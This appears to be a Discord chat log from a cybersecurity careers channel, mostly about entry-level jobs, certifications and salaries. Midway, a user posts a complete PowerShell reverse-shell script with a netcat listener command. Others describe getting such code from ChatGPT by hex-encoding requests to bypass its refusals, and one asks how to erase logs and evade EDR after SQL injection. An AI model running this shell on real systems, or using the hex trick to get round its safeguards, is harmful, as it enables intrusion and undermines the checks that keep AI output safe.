the reality is that companies are hesitant to hire entry level people because entry level people aren't really useful until about 6 months in, sometimes even 1 year in. Like you don't really hit a rhythm until that point. At which point a company has spent money to train up someone, then they end up jumping to another company. Now what also happens is that if someone consistently jumps companies to increasing raises, they also end up not advancing in their skills as much as say someone who starts taking on more responsibility after 1 year. So if we had it so someone was likely to stay after year 1, companies would absolutely be willing to hire more entry level people but that isn't the case so they are less likely at that point to risk entry level people. Not to say it doesn't happen, it does.
I think one factor to also consider is the company's size, growth rate, and how mature is their security programme. Bigger companies are more flexible in hiring entry level roles especially when they have new clients or new features being produced while smaller companies will opt for more senior people cause they will probably want to keep a lean team.
Companies that are starting to take their security programme seriously now will look at more senior level roles rather than filling out with entry level people while people with more mature programmes are able to hire more entry level roles depending on the growth they are looking at.
can PJPT certification help me land my first jr pen test job or ill need more ?
I think its exactly the opposite
Big companies only want to hire the seniors because theyve got the money while smaller companies hire juniors and teach them in hopes of them staying there
There's no ultimate answer to this. PJPT will definitely help you but you can also get hired without certificates
True in some cases but you also have to factor in growth rate but I disagree with smaller companies hiring more juniors.
With a smaller company, you work with a much more constricted budget and your team won't usually be that big. Factor in the investment to juniors, small companies might take less chances on entry level versus people with experience since there will be a much shorter time to train them up versus juniors.
You also have to consider what business the company is in. All large companies will have in house cybersecurity teams. I work for one such large company. We do hire people directly out of college but the majority of our hiring seems to be people with some experience.
I have heard consultancies are more willing to hire junior employees because they are selling their cybersecurity services to outside companies.
Can one secure employment solely based on TryHackMe certifications without a computer science degree?
It's not impossible, but it's definitely not easy.
especially remote part-time , or remote entry level positions
you don't need a degree at all (for entry) if you can prove that you know the topics & have experience for example
i see, but whats the best place to search, I used to check many websites such as remotive etc
i have a remote job, but in my country, i don't know the best way for international jobs, i am sorry
yeah i see,
in my way i would just search in the countries that speak my language and lookup for a job that is remote. feels like most jobs today in it-security are anyway remote. apart from some special cases like forensics for legal reasons ofc
Hey y'all , is there a way u can piggyback on a gateway with a prepaid service
wut?
Sth like getting free net on a prepaid gateway ??
what gateway? what service?
an isp offering wifi connection services , for u to use that service , u have to buy a subscription package , is there a way sb can bypass that
You know that would be illegal right?
I know that bro , can u help a brother out
:hammer: redkite_21#0 has been banned.
Bye.

Red teamers/penetration testers. What are some projects that you'd see on someone's resume and think "Oh that's interesting!". We hear about the keyloggers and port scanners and nothing is wrong with that. But what are some original project ideas? I'm trying to build some cool projects for my resume
Y'all what's the difference between cyber security and information security. I swear it's the same thing
Information security is broader, cybersecurity is part of information security
Hm interesting
So I'm guessing information security can be anything that's keeping information right?
Infosec includes the keys to your filing cabinet.
```
function Invoke-ReverseShell {
    $IP = 'YOUR_IP_ADDRESS'
    $Port = YOUR_PORT_NUMBER
    $Client = New-Object System.Net.Sockets.TCPClient($IP, $Port)
    $Stream = $Client.GetStream()
    [byte[]]$Bytes = 0..65535|%{0}
    while(($i = $Stream.Read($Bytes, 0, $Bytes.Length)) -ne 0){
        $Data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($Bytes,0, $i)
        $SendBack = (Invoke-Expression -Command $Data 2>&1 | Out-String )
        $SendBack2 = $SendBack + 'PS ' + (pwd).Path + '> '
        $Sendbyte = ([text.encoding]::ASCII).GetBytes($SendBack2)
        $Stream.Write($Sendbyte,0,$Sendbyte.Length)
        $Stream.Flush()
    }
    $Client.Close()
}
```
Note: Replace 'YOUR_IP_ADDRESS' with the IP address of the listener (e.g., your machine) and 'YOUR_PORT_NUMBER' with the port number you're listening on.
To start listening on your machine, you can use Netcat (nc) with the command: nc -lvnp YOUR_PORT_NUMBER
WARNING: This script opens up a backdoor to the machine it's executed on and should only be used for educational purposes or authorized security testing.
Backdoor
Made by chatgpt
?
No actually
I converted my text to hex and then asked gpt to follow the hex instructions
Sorry its your name
Red team infrastructure
Learn how to build it, automate it, and how to integrate it across different providers
Bonus points if you include OPSEC considerations
is it still a thing?
I think I did read a blog abt it a long time ago.
Do you mean C2 servers?
No, not just C2 servers. Your entire infrastructure. Like your short term infra to send test payloads on the org so you don't burn your actual infra, redirectors, phishing component, how you'd obscure it, secure it, etc.
Okay I'll need to do more research about it. I don't know about all that. Do I need to program all those or can I integrate multiple tools?
You can integrate multiple tools, you'll also be delving in a bit of DevOps pipeline for it
You can also do something a bit smaller, creating a CICD pipeline for your red team tools
ZeroPoint security has a good course on it for 30 GBP i think
Do you happen to know of any resource online to learn about it?
For red team infra, i think theres lots on Google
I dont know any off the top of my head
Okay thank you I'll research tonight!
I tried this using hex about 7 days ago but it only generate code for backdoor i tried making ransomware but it did not
I have a question :
How hard is finding bugs should i start studying bug bounty from htb or thm is it worth it ?
I know that there is a good demand for cyber security analyst as a broader field but any of you guys know about forensics/malware analysis field particularly?
the demand of those fields and maybe how to break into the industry
thru that
Well, if you want to do malware analysis, you'll most definitely want to learn a few things about reverse engineering. You can find sites like MicroCorruption that are completely dedicated to this. They even offer you to apply for any of their positions, but you'll need a degree and probably two years experience
can you give me an idea of how that particular field might evolve in the future?
The use of AI to do basic checks, make some analysis, then it'll be up to the analyst to confirm it
hi guys can i ask for some career advice
thats what this channel is for
A theoretical question, did an attacker manage to find sqli and the attacker wants to dump, does he have the option to delete logs? Is there an edr or a soc department that can catch it and how can it actually bypass it? I realized that if the attack is done at a slower pace then it can lower the suspicion, but is it possible to make logs disappear?
Sure. Plenty of ways, depending on how badly you want them deleted 🤷‍♂️
The real question is: why would you want them gone?
Guys.. I've been wondering. For those of you who already have careers in cybersecurity. How much is an average salary for an entry level job in your country and is the same salary available for remote workers?
I'm preparing for a little white vs black hat debate, could use all the information anyone would like to share.
I'm seeing you here for the first time. Thanks for all your content @undone shore. I really love your rooms on thm
Gave +1 Rep to @undone shore (current: #9 - 739)
there is no debate, black hat discussion beyond "it's illegal don't do it" is not allowed in this server.
Nonetheless I would still argue that it's better to be on the white side. But I would still like to know what anyone should be expecting at entry level and white is too little to accept. Especially from different countries
Understood. I wasn't going to discuss it on the server though. But where I'm from, there's this portrayal of white hats as less advantageous. Wanted to argue it out with some friends of mine. But I'll take your advice anyway. No such discussion on the server.
The big advantage to not breaking the law is that you don't have to worry about jail time, fines, and the potential of not being allowed to own or touch technology.
There's also the ethical question of what kind of person do you want to be: do you want to be a thief and dishonest, or do you want others to be able to trust you, and to act in a way that benefits society and yourself?
I had a research project running some sqli payloads and was told to execute it "cleanly" to your question is this legal
Exactlyyy!! I really don't understand why some people would rather take the risk. Last year a bank employee in my country stole an equivalent of about $92,000 through cyber fraud and tried to escape the country with his girlfriend and got caught. He's facing jail time now. Personally I think a lot of people are deceived by the way movies portray breaking the law as cool. One criminal being chased by organizations and evading them all. While it portrays white hats as some dudes ignored in a basement, with no social life, no friends and no soft skills and I strongly disagree with that.
Ultimately I don't think breaking the law is worth it under any circumstances for any reason. On Salary.com it says that average entry level job salary for cybersecurity analysts is about $100,000. $8,000 more than what was stolen in that incident.
In addition to ethics, I think it is actually more rewarding to be white than black. I just want to know from someone who can confirm it first hand.
it can vary quite a bit on the average salary for entry level even within a country
Oh okay, what's the average in your country?
I dunno, I'd have to google but I'm in the US so it varies widely, an average wouldn't really tell you much
Oh okay... I'll keep searching.
Thanks anyway
Gave +1 Rep to @pseudo creek (current: #14 - 476)
Hi, I would really appreciate help to really understand my question, thank you very much in any case
Gave +1 Rep to @undone shore (current: #9 - 740)
you wrote the question, are you saying you don't understand the question you asked?
im asking
"Cleanly" does not have a standardised definition in that context. I'd personally take it to mean "executes successfully and does not throw an error", but even then error-based blind SQLi works by deliberately throwing errors, so is that inherently unclean?
Either way, if the server has been configured in line with best practices then everything will be logged and monitored. Disrupting that is always possible but may require... extreme... measures, which wouldn't apply to a research project (unless you've coded in another vulnerability which aids you there), and would always be out of scope in a pentest / red team engagement.
I understand, thank you very much
Gave +1 Rep to @undone shore (current: #9 - 741)
Np
Can you offer me some insight into my question? I'm wondering what the average entry level salary for a cyber security analyst is
Cyber Security Analyst, as in, SOC analyst? £25,000 - £35,000-ish for entry-level, depending on past experience, etc
Can using a proxy lower the level of suspicion both from the edr system and from the soc department? By the way, thank you very much for the help, I remind you that everything is for study purposes and I do it as a job
Think about what does a proxy actually do?
I understand, but for every req I will use a proxy, isn't that excessive? Isn't it better if I do the attack more slowly?
Wut..?
why
Well, why would you use a proxy, and why would you make the process slower?
I thought so that the edr system would not alert the soc department
If I'm wrong I'd love to learn
Why would a proxy help with that? ๐ค
If you'd use a proxy that's publicly known then it would be flagged immediately
If it sees all req very frequently from one ip address it will alert as something suspicious
Yes.. I did mean SOC. So that's the range in the UK. Is it same for a remote worker?
sorry to be so curious, but what about a Penetration tester's salary at entry level?
Oh, you mean rotating proxies?
Remote workers as in working from a foreign country or remote as in working from home but within the country?
I meant remote workers from foreign countries. But I'm now curious about those within the country as well.
Pentest salary entry level tends to be higher, but it's also harder to get into with no previous experience, so it kinda balances out. Not sure what it is across the industry in the UK, simply because it tends not to be an immediate grad job so I've not seen as many of my peers go into pentest jobs as I have seen them go into SOC jobs.
Rough estimate I'd say probably around £30k-£50k "entry level". I started on about £45k straight out of uni joining an internal finsec pentest team, but consultancies tend to pay more than internal teams, so 🤷‍♂️
WFH within the country is unlikely to be less (or much less at any rate). Orgs tend to pay in bands according to location (e.g., if I were based in London I'd be paid more than I am being based up north simply because the cost of living is significantly higher down there).
In terms of remote workers in foreign countries, I'm not sure I'm afraid. My experience is of the financial sector which tends to be quite strict with remote working -- e.g., we only take people from countries in which we already have a presence (i.e., an office), which I don't think even counts as remote work at that point
Thanks a million @undone shore
Gave +1 Rep to @undone shore (current: #9 - 742)
Np
my company bases pay on where you live. We don't hire people from foreign countries for cyber security positions but what we do is may have an office in a foreign country (UK, AU for instance), they may be allowed to do limited work for the US but they are paid salaries that are standard in said country they reside
Oh wow.. I see.
Do you guys work with other countries tho
our cybersecurity is 99% for in house cybersecurity only, there is some external work but that is limited and that work is performed by those in country. So we do have offices around the world
but like we have a follow the sun model for our SOC teams, so teams in the UK/AU may cover US off hours, meanwhile similarly for UK/AU, US may cover off hours for those countries
thanks I know a bit of reverse engineering to the point where it doesn't overwhelm me from the get go anymore
Gave +1 Rep to @limber shale (current: #476 - 9)
however i would like to improve that
anyone got any training programmes
or anything like that??
thank you too much appreciated
Check Open Security's training
It is also free
oh cool thanks
Can someone please tell me if i should take training from darkweb hackers ?
No?
I think you should take some time to consider what you just said, and then realize what you're asking/considering on doing.
Where is this question coming from?
Hassan
you are being too literal, we should drop this line of questioning
How to lose your identity in 3 simple steps
what did I say above? drop this line of questioning. Also what does any of the rambling you posted have to do with careers?
who deleted my message
?
I did, I said drop the topic, also what you posted had nothing to do with the channel topic which is careers
@uneven crescent has been warned.
I'm not gonna lie, I'm kinda discouraged
Getting trained from darkweb hackers does not mean to become a blackhat bro its just all about knowledge they have .
What do you guys think fr
I'm new into CS and even I know it's a terrible idea.
What you decide to do is up to you but also playing with fire but like I said, this topic is closed, no more discussion
Ok ma bad
whats the general expectation experience/qualification wise for ciso's
Well from what I seen a lot of jobs ask for CISSP, which you need 5 years proven experience before you can even take the exam
yeah i should qualify for CISSP i just can't afford to take it atm, i've got 3 years experience as an IT Manager, and been programming since 2012 bachelors in IT and currently working towards a masters of cyber security, originally my goal was security architecture but not much point coupling that with a degree and thinking ciso roles might be a better fit since most the commercial experience i have is in it management
long story short trying to work out what sort of roles i should be going for or what sort of process i should be looking into to eventually land a ciso role
im fairly confident in most areas i'd need to do the tasks within the role but my concern is essentially breaking into that role with the experience and qualifications i have
@pseudo creek will be able to help when she is on as she has the experience of taking the exam and has a lot of experience in this area
yeah i spoke to her before since security architecture was original goal, also part the reason trying to find out what i'd have to do to eventually move into a ciso role since i plan on doing the full masters eventually
you will need endorsement from a current isc2 member as well
also imo official cissp video course is useless
just buy their reference book + practice tests
cram for a weekend or two and you should be good
it's mostly just memorising stuff, nothing special really
but people in suits like isc2 so still worth it
ehh I took the CISSP eons ago so I'm not that much help
a CISO will have a wide variety of experience, often experience working in GRC
going from it management what would you recommend being a good next step towards that? should i be aiming for entry or should i be aiming for something that equates
I mean it depends, usually for cybersecurity management, they would want you to have cybersecurity work experience
was thinking since alot of it is it management could go hand in hand but not sure tbh so trying to work out best way to fill that gap
or would it be essentially go for entry level
well since you worked in management, you could try to figure out what jobs best fit you, like I said GRC is a good one and no you wouldn't be going for an entry level job although more technical jobs would want you to have more hands on experience before stepping into a more senior role
GRC isn't usually a technical role so it might be a good one for you
that makes sense, thanks
Of what use is a CC cert from ISC2? I completed the theoretical side, and I was a bit displeased with how little it covered practical stuff, and was instead more theoretical
Now I get that it is meant for absolute beginners, but still
I just need to take it now
Afaik There's no practical certs made by ISC² @lunar bobcat
The ISC2 has lots of different perks
Aside from the cert itself
Ngl, I learned some stuff I didn't know related to certain procedures
so sure
I don't know much about it but that is them trying to get a super beginner cert, it doesn't have any value really
For being a beginner myself, I see it as more of a filler, still
"Real" exams are something like CISSP, OSCP, etc
most people don't know about CC outside of beginners
like hiring managers, HR, etc
and yes, it is recommended that if you want to, take the CISSP, get the 'associate of ISC2' title until you get the experience
and how do I go about it?
well first step would be, figure out if it is what you should be really prioritizing over other things
if you are looking for an entry level job, things like Security+, understanding various technologies are probably more critical
I like to think I have a passion for cybersecurity
and so at first I'd look for working as a SOC analyst
as an example
so then things like Security+, possibly CySA+, Splunk and overall just general IT concepts (networking, OS, cloud, programming)
programming is not my strong point ://
Understanding, yes. Coding, no.
CCSP, CISSP are almost equally theoretical tbf, that's just isc2 style
Hi Everyone! Hope everyone is doing well! I have IT experience, security+ and have side projects as well. Other than networking and applying to the usual job boards like (linkedin, indeed, builtin, etc), what is another good website to find a cyber security position?
You can directly check the websites of companies you're interested in, if there are any. Big consultancies usually have a lot of open jobs in various positions.
Not sure if it's popular where you live or if you use it already, but stepstone is also a good website to look.
okay thanks. yeah I'm in the US so I do go on the company websites since that's the best thing. But I'll check out stepstone as well.
thanks again !
Hope it helps
Hello everyone! I'm seeking information on various types of cryptographic attacks on protocols like TLS and SSH to enhance my cryptography skills. If anyone has knowledge about different security attacks in this domain, please share the information. I would appreciate any assistance!
you can check the book Real World Cryptography, it has the attacks, as well
Thank you for providing the information
Gave +1 Rep to @rain stratus (current: #1015 - 3)
Is this school work?
I am developing a C++ library that covers protection against attacks such as MITM, POODLE, BEAST, Heartbleed, and Oracle. I believe that during the process, I will be able to discover other types of attacks
Aren't those attacks very old?
Using TLS v1.3 negates all of the aforementioned. MITM on the other hand, in what scenario are you looking at?
Yes, those are old types of attacks
There is a risk of downgrading the TLS 1.3 protocol version. Even though it is improved, this poses a threat of old attacks being used as a result.
I haven't fully figured out the solution for defending against attacks yet; most likely, I'll be using various methods such as Proof of Work, HMAC, Certificate, tokens, etc.
What type of positions should I be looking for if I wanna move from software engineering to cyber security with a Comp. Sci. degree and Sec+ cert?
I only have about 2 years professional experience
prolly SOC Analyst, and if you really want
since you have experience on board
maybe like a SOC Analyst with more duties
different companies request different things
Ok. I wasn't sure what exactly to look for since each job post for the same title have different duties/requirements
what is your specific experience with software engineering?
so, doing coding and creating features?
Ehh
I work for the government so we haven't really done anything
Just projects that get tossed
have you been involved with stuff such as devops or sysadmin?
So I have a little experience in a lot of things
Yeah I've done some docker stuff
Not much depth
Setting up pipelines on ADO, docker stuff for developing, etc
you could try an appsec role
have you tried applying security principles into those pipelines, docker, etc. ?
like not running containers with root privileges
Not really since we don't use the pipeline
you have projects outside of work that you apply security?
Damn soc analyst salaries are not looking great
There is a scary lack of positions around me
Try job fairs
Where?
Universities around you, conferences
The only person who goes to the job fair at my local university is the people I work for :^)
Not sure what we have here for conferences… I know a nerd convention I'm going to September has an IT/security subsection I could network at
DICE southeast is tomorrow 3 hrs away 
That looks interesting
Check which companies have offices near you and maybe apply directly
I'm looking a few hours away because this area sucks for tech
Is there a point in making a LinkedIn account if you're not looking for a job in the industry at the moment?
Always good for potential recruiters to reach out/network
Hello, need some advice ... well I'm a cybersecurity graduate but I worked for three years as a software engineer .... now I think it's time to go back to what I like more .... but don't know from where I can begin (certs, courses ...)
What can you advise for protection against protocol downgrade attacks?
Ask in #general
guys, need help
I recently passed the Jr pentester course
and realized that I'm interested in web hacking and mb Networks and ABSOLUTELY NOT in privEsc
What i need to do\learn next?
or need to ask in other rooms?
thx
is soc level 1 and soc level 2 learning path enough to get an entry level blue team job?
It gets you started but you need to do more
Need more experience and projects if possible
I spend my limited time on cyber security instead of preparing for the university exam :d
Uni is more important than tryhackme. Hate to say it but it's true
Yes, but we have a problem, I need to take a break from one of these. and I don't want it to be cybersecurity
got any other activities you can do?
From what I understand most people are starting with ( Comptia ) Network + , Security + , Pentest + , & then try other stuff like TryHackMe .. etc ( I was suggested to place , this question here )
Let me know if this is the " ideal " path , people should take.
Hello everyone, I'm quite new to the field which made me create a new LinkedIn profile, I'm trying to build some connections and would appreciate adding me: https://www.linkedin.com/in/amine-elguermi/
Hey guys I am prepping for Active Directory to clear OSCP any suggestions in THM learning modules that can help ?
the THM Active Directory networks are good
so does anyone here got experience moving their major from networking to cybersecurity?
would like some advice on how you guys do it
i'm currently eyeing for CompTIA Pentest+ and CEH
I also keep OSCP for my endgame goal, but I know I'm way too far for something that advanced
Can you suggest some projects
Pentest+ and CEH are vastly different. I think Pentest+ goes more in how to manage a pentest and CEH is just all around tbh
CEH has bad rep, Pentest+ is something required by US govt agencies I think ?
OSCP is not really that advanced. It's marketed as an entry-level certification to pentesting
Do you think HTB CDSA and CPTS are good ?
Yes, very good. The only thing stopping them is they aren't that recognized yet
But doing those will get you skill and experience? Which are required for jobs right?
Skill? Yes. Experience? No
Oh okay Thanks for the talk bro
Gave +1 Rep to @dense dagger (current: #22 - 358)
lots of people can say that, but not me lol. I only have CTFs and some network-related security skills, considering my expertise now is on enterprise networking.
I've always intended to move to cybersecurity once I've completed my bachelor degree and CCNA, which expires next year. Guess now is the good time for that, but i still have no idea how
If you want to tackle OSCP, do Jr. Pentester Path -> Offensive Security path -> Wreath Network
Then you will be prepared
alright, thanks 4 the help
Gave +1 Rep to @dense dagger (current: #22 - 359)
Not to mention, if you do the CPTS path and pass the exam, you're ready for OSCP, because CPTS is much harder than OSCP
And the big difference is in CPTS you get 2 attempts and 10 days. On the other hand, in OSCP you get only 24 hours for attacking and 24 hours for the report, which is kind of a short time
Like Mknukn mentioned CPTS not recognizable around globe so if you really looking to get a job try to do OSCP and it will help you a lot
i can try to do both honestly. Im a network engineer currently. And as of now, my focus is to shift from network engineering to SOC/red teaming jobs that my company have. So, for my situation now, OSCP and Pentest+ are more important. But skill wise, I'll look into CPTS as well
Nice, you do both obviously but it's all about budget but yeah good luck
Hey all, taking the Pentest+ tomorrow, does anyone here have any tips or gotchas from your experience to look out for?
Best of luck with your exam. I'm sure you've practiced plenty and understand all the concepts discussed in the training you took. Just read the questions carefully and make sure the answers you choose accurately reflect the question being asked. Many multiple choice tests rely on your interpretation of the terminology in the questions. I don't think anybody can give you details about the exam content itself, apart from how the questions will be similar to many of the practice questions in the associated study guide, etc.
Hey all, hope everything is going well, wanted to put it out here, is there anyone that knows of possible entry level job opportunities out there? It's been extremely difficult for me to find and acquire an entry level position in the cyber security career field. I am currently working on my BS in Information technology with a special in cyber so anything would help.
Keep it going with your degree course. See if there are opportunities through your college or via LinkedIn/Indeed and other jobs sites for graduate opportunities and internships. Many companies have such programs in place and tend to open recruitment in this fashion at this time of year. You might consider certifications. A lot of the time an employer will support you in acquiring certifications that are relevant to your new position, but occasionally you might be expected to already hold or be pursuing one or several.
For instance, it can help to do the IBM or Google cybersecurity courses on Coursera. These are certificates and you can possibly cram them during the free week they give you at the start. Alternatively, the ISC2 CC free exam and training might also be considered a good indicator of your intention to pursue a career in cybersecurity, but it does have an added yearly cost to maintain and encourages you to pursue other training and certifications, on your way to acquiring their pricey and somewhat sought-after CISSP sometime down the road.
Another reasonable option is the Security+, as it's widely recognised as an entry-level certification in the field, and also a first step on the DoD certification stream (if you're American)... You might also consider having a blog or a Github to showcase the things you're studying. There are tonnes of resources (books, courses, certifications & projects) that can help you demonstrate your learning and progression
Do you guys recommend to go for eJPT first or CEH for my first red team cert?
neither?
are you in India?
No, Belgium
yeah I wouldn't do either of those, you might have to look for Belgium specific requirements, OSCP, from what I understand is very popular in EU as well as other places
there is also PJPT or PNPT from TCM Security or CPTS from HTB but those most likely wouldn't have hireability factors
I wouldn't recommend either of those. eJPT and all INE certs/training have vastly poorer quality since they took over from eLearnSecurity. Also, unless you're in India, I'd avoid EC Council/CEH altogether. Their overpriced multiple choice quiz and a lot of their content are reportedly plagiarised from other companies and they have a reputation for highly unethical practices.
I'd suggest pursuing CompTIA certs like Network+, Security+, CySA+ or Pentest+ starting out and also consider certs like the TCM PNPT, HTB CPTS, OffSec OSCP, and down the road consider Zero-Point's CRTO I & II, Altered Security's CRTP/CRTE. But also, spend time first playing around here on THM and discussing your options with Zojja or myself and the other community members
oh yeah I always forget zero point's CRTO, lots of people like that one
Yeah it looks really interesting and you get to play around with Cobalt Strike in their labs. There's also no report requirement
Don't security conventions have recruiters
A recruitment convention might have a method to share your cv, regular computer conventions, they might give you some reading material and an email address/website to send your application, but you'll have far more opportunities through LinkedIn, Indeed, et al.
The best resources for job searching will be the connections you make at university and alumni groups.
Hello, need some advice ... well I'm a cybersecurity graduate but I worked for three years as a software engineer .... now I think it's time to go back to what I like more .... but don't know from where I can begin (certs, courses ...)
Subtlety said a pretty solid line up here #cyber-and-careers message
Thank you so much
Gave +1 Rep to @brittle pier (current: #180 - 33)
I just realized that CEH is a multiple choice exam.
doesn't it sound a bit inconvenient?
like becoming a hacker via multiple choices??
It's not a great exam
Is the learning section in tryhackme free or paid?
There are subscriber paths and free paths
Tho for the subscriber paths you can find free rooms people made that are about the same stuff
"Some"
Do you happen to know or know what to look for when going for entry level job positions with no experience? What could be the best started jobs to get my foot in the door to apply? Every job it seems to require 3-10 yrs of experience and it blows my mind that there are no entry level jobs that I can find that are 0 yrs experience?
@winged haven I am going through the same scenario currently but have decided to start with a help desk IT job and it in a related field, my goal from there is sys admin and then from there hopefully be done with school and find a cybersec job
@hallow raptor really? Well that's nice to hear others are going through the same. Because I have been trying for a year now and nothing thus far.
In my opinion, it just takes two main things tbh. Being as persistent as possible no matter how shit it feels not getting call backs or anything... trust me I know, and learning as much as you can.
the more you learn the more you know which you can use in applying for jobs and eventually you might even be able to skip through job tiers because of what you know. BE a SPONGE
Appreciate it @hallow raptor this helps a lot. Guess for now just keep applying, and pray. Any companies you think would be best bet?
I would look local, and honestly try on-site over remote if you can. Remote is awesome cause you're at home but on-site if you have other peers there you can use them as resources to learn and grow. Also narrows the application list as a lot of people are looking for remote work currently
Hello, does it help to publish rooms done to linkedin to find job opportunities or do recruiters not care?
Probably not, unless you're the first one to complete it, or otherwise do a room where no one else has made a write up for. There's no way to tell if you completed it off of skill or off a guided spoon fed walkthrough.
Yes you're right but it means also that you can achieve a pretty good decent score with all the writeup by cheating and then tryhackme profile doesn't help at all on job seeking? To be clear, I'm doing thm to learn and not to find a job, just wondering if it helps as a kind of resume? Prob not
That's correct, if the recruiter or interviewer knows what thm is and you use that as your only qualifier, it may not speak as well of you as you hope it would
Can you help me decide how to transmit data over TLS - in blocks or one-time? The first option offers high security, while the second prioritizes performance and efficiency. Which solution should be preferred?
Hey can you ask your friend to post it here instead of you please?
in both cases the cipher contexts would start the same, so it wouldn't really matter much
Passed the Pentest+ exam
Besides the OSCP, what are some other desirable red-teaming certs that are around that level of knowledge/practical knowledge?
Well done! Some that come to mind are PJPT, PNPT, CRTO. Keep in mind that the exams will be very different compared to Pentest +. No multiple choice questions.
Question: do certs give you instructions on the stuff you have to research in order to pass? Or do you just study whatever you think would help you pass it
Like are you going in blindly?
Most will give you all the details needed and provide you with study material (some include this with the exam fee, others ask for more $$).
I'd recommend visiting some of these websites to have a look at their certs: CompTIA, OffSec, TCM Academy,
Thanks
Gave 1 Rep to drgonzo7383 (current: #48 - 150)
Thank you. I'll take a look into those, the more practical questions the better in my opinion. That's what I liked about the eJPT v1
Gave +1 Rep to @little matrix (current: #48 - 151)
In my experience, I find learning the concepts of theory and applying them to practical knowledge is most important. A lot of certs will cover these concepts and then either stay surface level or dive into specific topics. Usually, will aim for the certs requirements but will explore a bit and try to learn things the cert might not talk about.
I'm sure there's a better way out there but that's just what I do lol
I actually like that because diving deeper gives you a better understanding with the surface level stuff
Exactly
Pentest+ -> PJPT -> OSCP yea/nea?
Hello, do you recommend pecb certs?
Pentest+ is good for theory and might be recognised by hr departments as your intent to pursue pentesting, but has no practical exploration/examination. PJPT covers the first section of the PNPT, so it might be more value to just do that. The OSCP is a complete exploration of the junior pentester path from basics to having the pentesting skills for a junior role and is highly valued by HR departments, pentesting teams and their clients.
You might alternatively pursue CPTS, CRTO, CRTP/CRTE. You can get comfortable with a lot of the skills needed, from Linux, Windows and networks to more complex concepts through THM and the paths and networks available to explore.
Check your local job market which is desirable
Hello everyone, which rooms do you recommend starting with for penetration testing training on the TryHackMe platform?
@naive wadi I had this question just a few months ago, did the Intro to Cybersecurity learning path then the Jr Penetration Tester learning path. I dont remember if certain rooms are for subscribers or not but the jr pen tester learning path was really fun, recommended to me by a friend/mentor in the field with OSCP
Do you have a chance to send me the links of the rooms you solved for learning, either privately or from anywhere?
just sent a dm of the jr pen test learning path
thank you for helping
Gave +1 Rep to @indigo light (current: #2040 - 1)
#general message shadow made a list of all the paths you should complete in order. You can skip all the blue team paths if you want
Hi, i have an interview next week for jr PT engineer, any advice to prepare for it? thanks
Turn up on time
It's very basic but it's got a fancy name and HR would generally be impressed by such a cool sounding certificate
jajaja good advice
"15 minutes early is on time, on time is late, and if you're late you're better not showing up"
Maybe not applicable to all situations, but the first two phrases are pretty good to adhere to
yeah I agree on the part that it is just a cool name certificate. But like what the point of it in the first place, any other certificate let take for example CPTS(certified Pen-tester specialist). It is way cheaper, practical exam heavy focused on AD which from my point of view is for world case scenarios.
It's pretty good for absolute beginners and people who want to dip their toes into infosec world, IMO but not really worthy of the title "Certified Ethical Hacker"
as you said it only got the cool name. and I wouldn't think it would be good for beginners cause it won't take you from a beginner to a medium hacker while other certs do so like OWSP, OSCP, CPTS ...
Fair point but in a lot of cases certs are a way to get past HR
well yeah I agree with you
but having a experience from real world attacks would be more efficient
I got EMAPT and ECCPT but often get contacted by recruiters because of the CEH.
well the cool name I guess of being a "Certified ethical hacker"
Working in security is its own beast. Experience will accumulate. Certs are fine for testing one's own skills and building confidence but there's also a lot of free / cheaper resources out there like CTFs and tryhackme labs
Let's make a new multi choice cert called CERTIFIED MALICIOUS THREAT ACTOR
CMTA
cool
Hello, I recently passed comptia security+ and CC, what would you guys advise me to do as next certification? Thanks for responses
so i'm remaking my resume to 1 page "classic style" one, I have:
work experience & projects:
skills and technologies:
certification:
education:
I cut summary because nothing else fits, probably my picture dont fit either if i wanted to add it. Also i put work experience and projects together because the IT stuff isn't technically work experience but stuff i've done by myself on my homelab etc.
I don't think it'd fit to separate them but probably makes no difference (?)
Is it a good layout or should i add a summary also?
depends, projects, are those projects outside of work? If so, I'd put those near last
yeah IT projects, just to have some sort of "IT experience" to speak of
dont have actual IT work experience yet
yeah still, I'd put that at the end. If you have no IT experience, then possibly move skills to the top
mm alright. And having a summary doesn't really matter right?
kind of, but it could be useful to explain why the change in jobs
like I don't have one but my work experience would line up with any jobs I plan to apply for
even then i don't think i should cut any of those 4 sections for the summary? Dont have space otherwise
how many years of work experience do you have?
Im applying for work experience and I found a private detective service in my city online, however their services seem shady. Would anybody go into DMs to help me with this?
If its shady don't apply and ignore it.
im tryna build a resume and i was wondering what projects i could add to maybe boost my chances
They should be close to what you're applying to
yea thats the thing not sure what to do
so im applying for a forensic position
i have a few image processing and recognition projects
other than that im tryna add something extra
Set up your own homelabs for forensics in your house.
Plenty of free open source software to use, and there is plenty of ready made images for the purpose of forensics.
Have a look around on your facebook marketplace etc.
ah ok thx
Gave +1 Rep to @broken idol (current: #1 - 2110)
Smart. I have found one out of three that isn't shady now
@broken idol could I DM you regarding the previous issue?
Being the shady work?
Nah.
There's no need.
Hello, myself Ameya I'm from India and a recent graduate from 2023 engineering batch. I've done Bachelor of Engineering in Information Technology. I've been placed in an Indian multinational company but since it's a mass hiring, they're hiring as per different levels of packages (in batches), so I'm not yet onboarded, it's been 9 months at home, I thought of utilising this time to improve my Cybersec skills where I've a liking, I hate DSA btw.
I've done 4 internships (Java, Web Dev, Data Sci, Dotnet) over the course of my engineering period. Apart from these I've also completed the first course (Foundations of Cybersecurity) of the Google Cybersecurity Professional Certificate. I've completed Pre-Security path & 70% of Beginner Path on TryHackMe. As projects on my resume, I've some projects like Digital Voting based on Django, Stock Prediction, Web Dev based clones of website, Forex Calculator, World clock based in HTML, CSS etc. But a Cybersec related project I've done is a Password Cracker which brute forces a hash & tries to find the password from RockYou. And other one is a Vulnerability Scanner another python script that checks for open ports for a specific domain or if there is a specific port open.
I don't really know if I should start applying to Cybersec related jobs on LinkedIn but being from India idk what I should expect. I've been a Star Performer (Certification of an internship) and a Bronze Medalist during my school days in International Science Olympiad. This is my resume summed up.
Kindly suggest me some professional advice for job applying.
I'm even a guy who has stammering problem which makes me nervous during interviews & due to which I'm introvert. I learnt that since I'm an Indian, applying for Cybersec jobs in US, I won't stand a chance because most of their projects are related to government or army or very confidential such that they prefer only Americans even if we're more skilled.
Me having no liking in DSA I heard that there's no growth in Cybersec either if you're not good in DSA, my brother even showed me on LinkedIn some of the alumnus of top Indian institutes like IITs are not into Cybersec even people from his college in US. I've really lost hope I really wished I could get a job in Cybersec I've not tried applying yet though but this demotivated me.
I'm very much thankful for anyone who reads my story sorry I needed genuine advice.
You seem like THE guy to talk to about digital forensics. But if that is how you feel then it is settled
